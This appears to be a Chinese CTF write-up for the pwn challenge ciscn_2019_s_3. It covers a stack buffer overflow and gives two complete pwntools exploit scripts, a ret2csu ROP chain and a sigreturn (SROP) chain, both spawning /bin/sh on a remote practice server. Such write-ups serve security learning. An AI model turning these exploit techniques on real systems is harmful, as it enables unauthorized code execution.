HugeH4rD

ciscn_2019_s_3

Ubuntu18

0x01

checksec

[*] '/home/zelas/Desktop/pwn/ciscn_2019_s_3/ciscn_s_3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled			//栈不可执行
    PIE:      No PIE (0x400000)

IDA

vuln()

signed __int64 vuln()
{
  signed __int64 v0; // rax
  char buf[16]; // [rsp+0h] [rbp-10h] BYREF

  v0 = sys_read(0, buf, 0x400uLL);
  return sys_write(1u, buf, 0x30uLL);
}

0x02

现有gadget

.text:00000000004004D6 gadgets         proc near
.text:00000000004004D6 ; __unwind {
.text:00000000004004D6                 push    rbp
.text:00000000004004D7                 mov     rbp, rsp
.text:00000000004004DA                 mov     rax, 0Fh
.text:00000000004004E1                 retn
.text:00000000004004E1 gadgets         endp ; sp-analysis failed
.text:00000000004004E1
.text:00000000004004E2 ; ---------------------------------------------------------------------------
.text:00000000004004E2                 mov     rax, 3Bh ; ';'	//gadget1
.text:00000000004004E9                 retn

现有gadget不足够 ,用csu里面的

loc_400580:
mov     rdx, r13
mov     rsi, r14
mov     edi, r15d
call    ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8]
add     rbx, 1					//只需要上面的就行了
cmp     rbx, rbp
jnz     short loc_400580		//不用管这里的跳转

rip	rax	rdi	rsi	rdx
syscall	0x3B	0	0	0
csu		edi=r13d	rsi=r14=0	rdx=r15
	mov_rax_0x59_ret	/bin/sh+0x50	0	0
execve		pop_rdi_ret
		/bin/sh

r12 + rbx*8 = /bin/sh

思路利用 ret2__libc_csu_init 去构造 execve(“/bin/sh”,0,0) 来 getshell

0x03

exp

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
# io = process(['./ciscn_s_3'])
io = remote('node4.buuoj.cn', 25452)
main = 0x4004ED

payload1 = b'a' * 0x10 + p64(main)
io.send(payload1)
io.recv(0x20)
rbp_addr = u64(io.recv(6).ljust(8, b'\x00'))
print('[+] Rbp_address -->', hex(rbp_addr))
offset = 0x118
pop_rdi_ret = 0x4005a3
csu = 0x400580
mov_rax_0x59_ret = 0x4004E2
syscall = 0x400517
pop_rbx_rbp_r12_r13_r14_r15 = 0x40059A

payload2 = flat(b'/bin/sh\x00'*2, pop_rbx_rbp_r12_r13_r14_r15, 0, 0, rbp_addr - 0x118 + 0x50, 0, 0, 0, csu, mov_rax_0x59_ret, pop_rdi_ret, rbp_addr-280, syscall)
io.sendline(payload2)
io.interactive()

0x04

思路 SROP

0x05

# coding:utf8
from pwn import *

context(arch='amd64', os='linux', log_level='DEBUG')  # 
# context.log_level = 'debug'
# conn = process(["./ciscn_s_3"])
conn = remote('node4.buuoj.cn', 26685)
vuln_addr = 0x4004ED
mov_rax_sigreturn_addr = 0x4004DA
syscall_addr = 0x400501

# gdb.attach(conn,'b *0x40052C')
payload1 = b'/bin/sh\x00' * 2 + p64(vuln_addr)
conn.send(payload1)
conn.recv(0x20)

bin_sh_addr = u64(conn.recv(8)) - 280
print(hex(bin_sh_addr))

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = bin_sh_addr
frame.rsi = 0
frame.rdx = 0
# frame.rsp = bin_sh_addr
frame.rip = syscall_addr

# payload2 = b'/bin/sh\x00' * 2 + p64(mov_rax_sigreturn_addr) + p64(syscall_addr) + str(frame)
payload2 = flat(b'/bin/sh\x00'*2, mov_rax_sigreturn_addr, syscall_addr, frame)
conn.send(payload2)

conn.interactive()

匿名评论隐私政策

✅ 你无需删除空行，直接评论以获取最佳展示效果

ciscn_2019_s_3

0x01

0x02

0x03

0x04

0x05

Zelas2Xerath